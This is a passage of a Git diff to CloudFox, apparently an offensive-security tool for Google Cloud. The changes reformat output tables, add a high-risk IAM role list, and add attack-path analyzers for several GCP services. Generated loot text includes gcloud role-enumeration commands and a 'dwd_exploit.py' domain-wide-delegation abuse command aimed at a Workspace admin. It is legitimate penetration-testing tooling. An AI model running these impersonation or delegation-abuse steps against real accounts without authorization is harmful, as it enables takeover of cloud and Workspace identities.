domain-wide-delegation module for detailed exploitation: +# cloudfox gcp domain-wide-delegation -p %s + +# Quick test - requires SA key and target Workspace user email: +# python dwd_exploit.py --key-file %s-key.json --subject admin@domain.com --all-scopes + +`, sa.OAuth2ClientID, projectID, keyFileName) + } + + // Add section for old keys + if sa.HasOldKeys { + lootFile.Contents += fmt.Sprintf(`# === KEY ROTATION === +# This SA has keys older than 90 days (%d days) + +# List keys with age +gcloud iam service-accounts keys list --iam-account=%s --project=%s --format='table(name.basename(), keyType, validAfterTime, validBeforeTime)' + +`, sa.OldestKeyAge, sa.Email, projectID) + } + + // Add section for default SA + if sa.IsDefaultSA { + lootFile.Contents += fmt.Sprintf(`# === DEFAULT SERVICE ACCOUNT === +# This is a %s default service account + +# Check roles granted to this SA +gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains("%s")) | .role' + +`, sa.DefaultSAType, projectID, sa.Email) + } + + lootFile.Contents += "\n" } // ------------------------------ @@ -379,21 +482,20 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal } // getTableHeader returns the header for service accounts table -// Impersonation Type: What capability the Impersonator has TO this service account -// Impersonator: Who has that capability (can impersonate/manage this SA) func (m *ServiceAccountsModule) getTableHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Email", - "Attack Paths", + "SA Attack Paths", "Display Name", "Disabled", "Default SA", "DWD", - "Key Count", - "Impersonation Type", - "Impersonator", + "User Managed Keys", + "Google Managed Keys", + "Oldest Key Age", + "IAM Binding Role", + "IAM Binding Principal", } } @@ -418,21 +520,42 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser } // Check attack paths (privesc/exfil/lateral) for this service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { attackPaths = m.AttackPathCache.GetAttackSummary(sa.Email) } - // Count user-managed keys - keyCount := "-" + // Count keys by type and find oldest key age userKeyCount := 0 + googleKeyCount := 0 for _, key := range sa.Keys { if key.KeyType == "USER_MANAGED" { userKeyCount++ + } else if key.KeyType == "SYSTEM_MANAGED" { + googleKeyCount++ } } + userKeys := "-" if userKeyCount > 0 { - keyCount = fmt.Sprintf("%d", userKeyCount) + userKeys = fmt.Sprintf("%d", userKeyCount) + } + googleKeys := "-" + if googleKeyCount > 0 { + googleKeys = fmt.Sprintf("%d", googleKeyCount) + } + + // Format oldest key age + oldestKeyAge := "-" + if sa.OldestKeyAge > 0 { + if sa.OldestKeyAge > 365 { + oldestKeyAge = fmt.Sprintf("%dy %dd", sa.OldestKeyAge/365, sa.OldestKeyAge%365) + } else { + oldestKeyAge = fmt.Sprintf("%dd", sa.OldestKeyAge) + } + // Add warning indicator for old keys + if sa.OldestKeyAge > 90 { + oldestKeyAge += " ⚠" + } } // Build IAM bindings from impersonation info @@ -443,8 +566,8 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, keyCount, "TokenCreator", member, + m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, + disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "TokenCreator", member, }) } } @@ -453,8 +576,8 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, keyCount, "KeyAdmin", member, + m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, + disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "KeyAdmin", member, }) } } @@ -463,8 +586,8 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, keyCount, "ActAs", member, + m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, + disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "ActAs", member, }) } } @@ -473,8 +596,8 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, keyCount, "SAAdmin", member, + m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, + disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "SAAdmin", member, }) } } @@ -483,8 +606,8 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, keyCount, "SignBlob", member, + m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, + disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "SignBlob", member, }) } } @@ -493,8 +616,8 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, keyCount, "SignJwt", member, + m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, + disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "SignJwt", member, }) } } @@ -502,8 +625,8 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if !hasBindings { body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, keyCount, "-", "-", + m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, + disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "-", "-", }) } } diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go index 1d4a5725..99bf4187 100644 --- a/gcp/commands/serviceagents.go +++ b/gcp/commands/serviceagents.go @@ -37,7 +37,10 @@ Security Considerations: - Service agents often have broad permissions - Cross-project agents indicate shared service access - Cloud Build SA is a common privilege escalation vector -- Default compute SA often has Editor role`, +- Default compute SA often has Editor role + +TIP: Use the --attack-paths flag to analyze privesc/exfil/lateral movement potential: + cloudfox gcp service-agents -p PROJECT_ID --attack-paths`, Run: runGCPServiceAgentsCommand, } @@ -47,9 +50,10 @@ Security Considerations: type ServiceAgentsModule struct { gcpinternal.BaseGCPModule - ProjectAgents map[string][]serviceagentsservice.ServiceAgentInfo // projectID -> agents - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex + ProjectAgents map[string][]serviceagentsservice.ServiceAgentInfo // projectID -> agents + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + mu sync.Mutex } // ------------------------------ @@ -85,6 +89,19 @@ func runGCPServiceAgentsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logger) { + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_SERVICEAGENTS_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEAGENTS_MODULE_NAME, m.processProject) allAgents := m.getAllAgents() @@ -169,31 +186,60 @@ func (m *ServiceAgentsModule) addAgentToLoot(projectID string, agent serviceagen crossProjectNote := "" if agent.IsCrossProject { - crossProjectNote = " [CROSS-PROJECT]" + crossProjectNote = " [CROSS-PROJECT from " + agent.SourceProject + "]" + } + + // Check for high-risk roles + var highRiskRoles []string + for _, role := range agent.Roles { + riskLevel := getRiskLevel(role) + if riskLevel != "-" { + highRiskRoles = append(highRiskRoles, riskLevel) + } + } + + highRiskNote := "" + if len(highRiskRoles) > 0 { + highRiskNote = " [HIGH RISK: " + strings.Join(highRiskRoles, ", ") + "]" } lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ - "# SERVICE AGENT: %s%s (Project: %s)\n"+ + "# SERVICE AGENT: %s%s%s\n"+ "# ==========================================\n"+ "# Email: %s\n"+ + "# Project: %s\n"+ "# Description: %s\n", - agent.ServiceName, crossProjectNote, agent.ProjectID, - agent.Email, agent.Description, + agent.ServiceName, crossProjectNote, highRiskNote, + agent.Email, agent.ProjectID, agent.Description, ) + if agent.SourceProject != "" { + lootFile.Contents += fmt.Sprintf("# Source Project: %s\n", agent.SourceProject) + } + if len(agent.Roles) > 0 { lootFile.Contents += fmt.Sprintf("# Roles: %s\n", strings.Join(agent.Roles, ", ")) } - lootFile.Contents += fmt.Sprintf( - "\n# Get IAM policy for project:\n"+ - "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s' --format='table(bindings.role)'\n"+ - "# Test impersonation (requires iam.serviceAccounts.getAccessToken):\n"+ - "gcloud auth print-access-token --impersonate-service-account=%s\n\n", - agent.ProjectID, agent.Email, - agent.Email, - ) + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# List all roles granted to this service agent (clean output for screenshots) +gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains("%s")) | .role' + +# Show service agent with its roles (formatted for reporting) +gcloud projects get-iam-policy %s --format=json | jq '[.bindings[] | select(.members[] | contains("%s")) | {role: .role, member: "%s"}]' + +# Check what resources this service agent can access (with roles) +gcloud asset search-all-iam-policies --scope=projects/%s --query='policy:%s' --format=json | jq -r '.results[] | {resource: .resource, roles: [.policy.bindings[].role]} | "\(.resource): \(.roles | join(", "))"' + +# Check resource-level IAM bindings for this service agent +gcloud asset search-all-iam-policies --scope=projects/%s --query='policy.bindings.members:%s' --format=json | jq -r '.results[] | "\(.resource): \([.policy.bindings[] | select(.members[] | contains("%s")) | .role] | join(", "))"' + +`, projectID, agent.Email, projectID, agent.Email, agent.Email, projectID, agent.Email, projectID, agent.Email, agent.Email) + + lootFile.Contents += "\n" } // ------------------------------ @@ -208,16 +254,103 @@ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.L } } -// writeHierarchicalOutput writes output to per-project directories -func (m *ServiceAgentsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { - header := []string{ - "Project Name", - "Project ID", +// High-risk roles that grant significant privileges +var highRiskRoles = map[string]bool{ + "roles/owner": true, + "roles/editor": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountUser": true, + "roles/iam.workloadIdentityUser": true, + "roles/compute.admin": true, + "roles/compute.instanceAdmin": true, + "roles/container.admin": true, + "roles/cloudbuild.builds.editor": true, + "roles/cloudfunctions.admin": true, + "roles/run.admin": true, + "roles/storage.admin": true, + "roles/secretmanager.admin": true, + "roles/cloudkms.admin": true, +} + +// getHeader returns the table header +func (m *ServiceAgentsModule) getHeader() []string { + return []string{ + "Project", "Service", "Email", - "Role", + "Source Project", "Cross-Project", + "Role", + "Risk", + "Attack Paths", + "Description", } +} + +// getRiskLevel returns the risk level for a role +// Returns the risk reason if high risk, or "-" if not +func getRiskLevel(role string) string { + // Check known high-risk roles + riskReasons := map[string]string{ + "roles/owner": "Owner", + "roles/editor": "Editor", + "roles/iam.serviceAccountAdmin": "SA Admin", + "roles/iam.serviceAccountKeyAdmin": "Key Admin", + "roles/iam.serviceAccountTokenCreator": "Token Creator", + "roles/iam.serviceAccountUser": "SA User", + "roles/iam.workloadIdentityUser": "Workload ID", + "roles/compute.admin": "Compute Admin", + "roles/compute.instanceAdmin": "Instance Admin", + "roles/compute.instanceAdmin.v1": "Instance Admin", + "roles/container.admin": "GKE Admin", + "roles/container.clusterAdmin": "Cluster Admin", + "roles/cloudbuild.builds.editor": "Build Editor", + "roles/cloudfunctions.admin": "Functions Admin", + "roles/run.admin": "Run Admin", + "roles/storage.admin": "Storage Admin", + "roles/secretmanager.admin": "Secrets Admin", + "roles/cloudkms.admin": "KMS Admin", + "roles/bigquery.admin": "BigQuery Admin", + "roles/pubsub.admin": "Pub/Sub Admin", + "roles/logging.admin": "Logging Admin", + "roles/resourcemanager.projectIamAdmin": "IAM Admin", + "roles/resourcemanager.folderAdmin": "Folder Admin", + "roles/resourcemanager.organizationAdmin": "Org Admin", + } + + if reason, ok := riskReasons[role]; ok { + return reason + } + + // Check for admin/owner patterns + if strings.HasSuffix(role, ".admin") { + // Extract service name for cleaner output + parts := strings.Split(role, "/") + if len(parts) == 2 { + serviceParts := strings.Split(parts[1], ".") + if len(serviceParts) > 0 { + // Capitalize first letter + name := serviceParts[0] + if len(name) > 0 { + return strings.ToUpper(name[:1]) + name[1:] + " Admin" + } + } + } + return "Admin Role" + } + + if strings.Contains(role, "Admin") { + return "Admin Role" + } + + return "-" +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *ServiceAgentsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getHeader() // Build hierarchical output data outputData := internal.HierarchicalOutputData{ @@ -267,14 +400,7 @@ func (m *ServiceAgentsModule) writeHierarchicalOutput(ctx context.Context, logge // writeFlatOutput writes all output to a single directory (legacy mode) func (m *ServiceAgentsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { - header := []string{ - "Project Name", - "Project ID", - "Service", - "Email", - "Role", - "Cross-Project", - } + header := m.getHeader() allAgents := m.getAllAgents() body := m.agentsToTableBody(allAgents) @@ -334,27 +460,47 @@ func (m *ServiceAgentsModule) agentsToTableBody(agents []serviceagentsservice.Se crossProject = "Yes" } + // Source project (where the agent originates from) + sourceProject := "-" + if agent.SourceProject != "" { + sourceProject = agent.SourceProject + } + + // Check attack paths for this service agent + attackPaths := "run --attack-paths" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + attackPaths = m.AttackPathCache.GetAttackSummary(agent.Email) + } + // One row per role if len(agent.Roles) > 0 { for _, role := range agent.Roles { + riskLevel := getRiskLevel(role) + body = append(body, []string{ m.GetProjectName(agent.ProjectID), - agent.ProjectID, agent.ServiceName, agent.Email, - role, + sourceProject, crossProject, + role, + riskLevel, + attackPaths, + agent.Description, }) } } else { // Agent with no roles body = append(body, []string{ m.GetProjectName(agent.ProjectID), - agent.ProjectID, agent.ServiceName, agent.Email, - "-", + sourceProject, crossProject, + "-", + "-", + attackPaths, + agent.Description, }) } } diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go index 8e9914a7..ee2a7aea 100644 --- a/gcp/commands/sourcerepos.go +++ b/gcp/commands/sourcerepos.go @@ -211,15 +211,14 @@ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Log // writeHierarchicalOutput writes output to per-project directories func (m *SourceReposModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { header := []string{ - "Project Name", - "Project ID", + "Project", "Name", "Size", "Mirror", "Mirror URL", "Triggers", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } // Build hierarchical output data @@ -271,15 +270,14 @@ func (m *SourceReposModule) writeHierarchicalOutput(ctx context.Context, logger // writeFlatOutput writes all output to a single directory (legacy mode) func (m *SourceReposModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { header := []string{ - "Project Name", - "Project ID", + "Project", "Name", "Size", "Mirror", "Mirror URL", "Triggers", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } allRepos := m.getAllRepos() @@ -363,7 +361,6 @@ func (m *SourceReposModule) reposToTableBody(repos []sourcereposservice.RepoInfo for _, binding := range repo.IAMBindings { body = append(body, []string{ m.GetProjectName(repo.ProjectID), - repo.ProjectID, repo.Name, sizeDisplay, mirror, @@ -377,7 +374,6 @@ func (m *SourceReposModule) reposToTableBody(repos []sourcereposservice.RepoInfo // Repo with no IAM bindings body = append(body, []string{ m.GetProjectName(repo.ProjectID), - repo.ProjectID, repo.Name, sizeDisplay, mirror, diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go index 7dc9999e..951a44ae 100644 --- a/gcp/commands/spanner.go +++ b/gcp/commands/spanner.go @@ -221,29 +221,27 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) func (m *SpannerModule) getInstanceHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Instance", "Display Name", "Config", "Nodes", "State", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } } func (m *SpannerModule) getDatabaseHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Instance", "Database", "State", "Encryption", "KMS Key", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } } @@ -254,7 +252,6 @@ func (m *SpannerModule) instancesToTableBody(instances []spannerservice.SpannerI for _, binding := range instance.IAMBindings { body = append(body, []string{ m.GetProjectName(instance.ProjectID), - instance.ProjectID, instance.Name, instance.DisplayName, instance.Config, @@ -268,7 +265,6 @@ func (m *SpannerModule) instancesToTableBody(instances []spannerservice.SpannerI // Instance with no IAM bindings body = append(body, []string{ m.GetProjectName(instance.ProjectID), - instance.ProjectID, instance.Name, instance.DisplayName, instance.Config, @@ -294,7 +290,6 @@ func (m *SpannerModule) databasesToTableBody(databases []spannerservice.SpannerD for _, binding := range database.IAMBindings { body = append(body, []string{ m.GetProjectName(database.ProjectID), - database.ProjectID, database.InstanceName, database.Name, database.State, @@ -308,7 +303,6 @@ func (m *SpannerModule) databasesToTableBody(databases []spannerservice.SpannerD // Database with no IAM bindings body = append(body, []string{ m.GetProjectName(database.ProjectID), - database.ProjectID, database.InstanceName, database.Name, database.State, diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go index c68fcd0e..595ca56b 100644 --- a/gcp/commands/vpcnetworks.go +++ b/gcp/commands/vpcnetworks.go @@ -371,19 +371,19 @@ func (m *VPCNetworksModule) generateVPCNetworksDiagram() string { } func (m *VPCNetworksModule) getNetworksHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} + return []string{"Project", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} } func (m *VPCNetworksModule) getSubnetsHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs"} + return []string{"Project", "Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs"} } func (m *VPCNetworksModule) getPeeringsHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Network", "Peer Network", "Peer Project", "State", "Export Routes", "Import Routes"} + return []string{"Project", "Name", "Network", "Peer Network", "Peer Project", "State", "Export Routes", "Import Routes"} } func (m *VPCNetworksModule) getRoutesHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority"} + return []string{"Project", "Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority"} } func (m *VPCNetworksModule) networksToTableBody(networks []vpcservice.VPCNetworkInfo) [][]string { @@ -395,7 +395,6 @@ func (m *VPCNetworksModule) networksToTableBody(networks []vpcservice.VPCNetwork } body = append(body, []string{ m.GetProjectName(network.ProjectID), - network.ProjectID, network.Name, network.RoutingMode, autoSubnets, @@ -419,7 +418,6 @@ func (m *VPCNetworksModule) subnetsToTableBody(subnets []vpcservice.SubnetInfo) } body = append(body, []string{ m.GetProjectName(subnet.ProjectID), - subnet.ProjectID, subnet.Name, subnet.Network, subnet.Region, @@ -448,7 +446,6 @@ func (m *VPCNetworksModule) peeringsToTableBody(peerings []vpcservice.VPCPeering } body = append(body, []string{ m.GetProjectName(peering.ProjectID), - peering.ProjectID, peering.Name, peering.Network, peering.PeerNetwork, @@ -470,7 +467,6 @@ func (m *VPCNetworksModule) routesToTableBody(routes []vpcservice.RouteInfo) [][ } body = append(body, []string{ m.GetProjectName(route.ProjectID), - route.ProjectID, route.Name, route.Network, route.DestRange, diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go index e537cf8f..13515d61 100644 --- a/gcp/commands/workloadidentity.go +++ b/gcp/commands/workloadidentity.go @@ -69,13 +69,14 @@ type WorkloadIdentityModule struct { gcpinternal.BaseGCPModule // Module-specific fields (GKE Workload Identity) - per-project for hierarchical output - ProjectClusters map[string][]ClusterWorkloadIdentity // projectID -> clusters - ProjectBindings map[string][]WorkloadIdentityBinding // projectID -> bindings - ProjectPools map[string][]workloadidentityservice.WorkloadIdentityPool // projectID -> pools - ProjectProviders map[string][]workloadidentityservice.WorkloadIdentityProvider // projectID -> providers - ProjectFederatedBindings map[string][]workloadidentityservice.FederatedIdentityBinding // projectID -> federated bindings - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex + ProjectClusters map[string][]ClusterWorkloadIdentity // projectID -> clusters + ProjectBindings map[string][]WorkloadIdentityBinding // projectID -> bindings + ProjectPools map[string][]workloadidentityservice.WorkloadIdentityPool // projectID -> pools + ProjectProviders map[string][]workloadidentityservice.WorkloadIdentityProvider // projectID -> providers + ProjectFederatedBindings map[string][]workloadidentityservice.FederatedIdentityBinding // projectID -> federated bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + mu sync.Mutex } // ------------------------------ @@ -118,6 +119,19 @@ func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Logger) { + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, m.processProject) @@ -769,13 +783,12 @@ func (m *WorkloadIdentityModule) buildTables( // Clusters table clustersHeader := []string{ - "Project Name", - "Project ID", + "Project", "Cluster", "Location", - "WI Enabled", + "Cluster WI Enabled", "Workload Pool", - "Node Pools", + "Node Pools WI Enabled", } var clustersBody [][]string @@ -789,14 +802,16 @@ func (m *WorkloadIdentityModule) buildTables( workloadPool = cwi.WorkloadPool } + // Format as "X of Y" for clarity + nodePoolsWI := fmt.Sprintf("%d of %d", cwi.NodePoolsWithWI, cwi.TotalNodePools) + clustersBody = append(clustersBody, []string{ m.GetProjectName(cwi.ProjectID), - cwi.ProjectID, cwi.ClusterName, cwi.Location, wiEnabled, workloadPool, - fmt.Sprintf("%d/%d", cwi.NodePoolsWithWI, cwi.TotalNodePools), + nodePoolsWI, }) } @@ -811,13 +826,13 @@ func (m *WorkloadIdentityModule) buildTables( // Bindings table bindingsHeader := []string{ - "Project Name", - "Project ID", + "Project", "Cluster", "K8s Namespace", "K8s Service Account", "GCP Service Account", - "High Priv", + "High Privilege SA", + "SA Attack Paths", } var bindingsBody [][]string @@ -827,14 +842,22 @@ func (m *WorkloadIdentityModule) buildTables( highPriv = "Yes" } + // Check attack paths for the GCP service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + attackPaths = m.AttackPathCache.GetAttackSummary(binding.GCPServiceAccount) + } else { + attackPaths = "run --attack-paths" + } + bindingsBody = append(bindingsBody, []string{ m.GetProjectName(binding.ProjectID), - binding.ProjectID, binding.ClusterName, binding.KubernetesNS, binding.KubernetesSA, binding.GCPServiceAccount, highPriv, + attackPaths, }) } @@ -854,8 +877,7 @@ func (m *WorkloadIdentityModule) buildTables( // Federation Pools table if len(pools) > 0 { poolsHeader := []string{ - "Project Name", - "Project ID", + "Project", "Pool ID", "Display Name", "State", @@ -870,7 +892,6 @@ func (m *WorkloadIdentityModule) buildTables( } poolsBody = append(poolsBody, []string{ m.GetProjectName(pool.ProjectID), - pool.ProjectID, pool.PoolID, pool.DisplayName, pool.State, @@ -888,13 +909,12 @@ func (m *WorkloadIdentityModule) buildTables( // Federation Providers table if len(providers) > 0 { providersHeader := []string{ - "Project Name", - "Project ID", + "Project", "Pool", "Provider", "Type", - "Issuer/Account", - "Attribute Condition", + "OIDC Issuer / AWS Account", + "Access Condition", } var providersBody [][]string @@ -913,7 +933,6 @@ func (m *WorkloadIdentityModule) buildTables( providersBody = append(providersBody, []string{ m.GetProjectName(p.ProjectID), - p.ProjectID, p.PoolID, p.ProviderID, p.ProviderType, @@ -932,21 +951,29 @@ func (m *WorkloadIdentityModule) buildTables( // Federated bindings table if len(federatedBindings) > 0 { fedBindingsHeader := []string{ - "Project Name", - "Project ID", + "Project", "Pool", "GCP Service Account", - "External Subject", + "External Identity", + "SA Attack Paths", } var fedBindingsBody [][]string for _, fb := range federatedBindings { + // Check attack paths for the GCP service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + attackPaths = m.AttackPathCache.GetAttackSummary(fb.GCPServiceAccount) + } else { + attackPaths = "run --attack-paths" + } + fedBindingsBody = append(fedBindingsBody, []string{ m.GetProjectName(fb.ProjectID), - fb.ProjectID, fb.PoolID, fb.GCPServiceAccount, fb.ExternalSubject, + attackPaths, }) } diff --git a/gcp/services/attackpathService/attackpathService.go b/gcp/services/attackpathService/attackpathService.go index 0705cf05..0d44ef71 100644 --- a/gcp/services/attackpathService/attackpathService.go +++ b/gcp/services/attackpathService/attackpathService.go @@ -18,8 +18,14 @@ import ( // Resource-level IAM "google.golang.org/api/bigquery/v2" + "google.golang.org/api/cloudkms/v1" "google.golang.org/api/compute/v1" + run "google.golang.org/api/run/v1" + "google.golang.org/api/pubsub/v1" + "google.golang.org/api/secretmanager/v1" + "google.golang.org/api/spanner/v1" "google.golang.org/api/storage/v1" + cloudfunctions "google.golang.org/api/cloudfunctions/v2" ) var logger = internal.NewLogger() @@ -77,6 +83,54 @@ func (s *AttackPathService) getComputeService(ctx context.Context) (*compute.Ser return compute.NewService(ctx) } +// getSecretManagerService returns a Secret Manager service +func (s *AttackPathService) getSecretManagerService(ctx context.Context) (*secretmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetSecretManagerService(ctx, s.session) + } + return secretmanager.NewService(ctx) +} + +// getCloudFunctionsService returns a Cloud Functions v2 service +func (s *AttackPathService) getCloudFunctionsService(ctx context.Context) (*cloudfunctions.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudFunctionsServiceV2(ctx, s.session) + } + return cloudfunctions.NewService(ctx) +} + +// getCloudRunService returns a Cloud Run service +func (s *AttackPathService) getCloudRunService(ctx context.Context) (*run.APIService, error) { + if s.session != nil { + return sdk.CachedGetCloudRunService(ctx, s.session) + } + return run.NewService(ctx) +} + +// getKMSService returns a KMS service +func (s *AttackPathService) getKMSService(ctx context.Context) (*cloudkms.Service, error) { + if s.session != nil { + return sdk.CachedGetKMSService(ctx, s.session) + } + return cloudkms.NewService(ctx) +} + +// getPubSubService returns a Pub/Sub service +func (s *AttackPathService) getPubSubService(ctx context.Context) (*pubsub.Service, error) { + if s.session != nil { + return sdk.CachedGetPubSubService(ctx, s.session) + } + return pubsub.NewService(ctx) +} + +// getSpannerService returns a Spanner service +func (s *AttackPathService) getSpannerService(ctx context.Context) (*spanner.Service, error) { + if s.session != nil { + return sdk.CachedGetSpannerService(ctx, s.session) + } + return spanner.NewService(ctx) +} + // DataExfilPermission represents a permission that enables data exfiltration type DataExfilPermission struct { Permission string `json:"permission"` @@ -635,6 +689,34 @@ func (s *AttackPathService) AnalyzeResourceAttackPaths(ctx context.Context, proj computePaths := s.analyzeComputeResourceIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) paths = append(paths, computePaths...) + // Analyze Secret Manager IAM policies + secretPaths := s.analyzeSecretManagerIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, secretPaths...) + + // Analyze Cloud Functions IAM policies + functionPaths := s.analyzeCloudFunctionsIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, functionPaths...) + + // Analyze Cloud Run IAM policies + cloudRunPaths := s.analyzeCloudRunIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, cloudRunPaths...) + + // Analyze KMS IAM policies + kmsPaths := s.analyzeKMSIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, 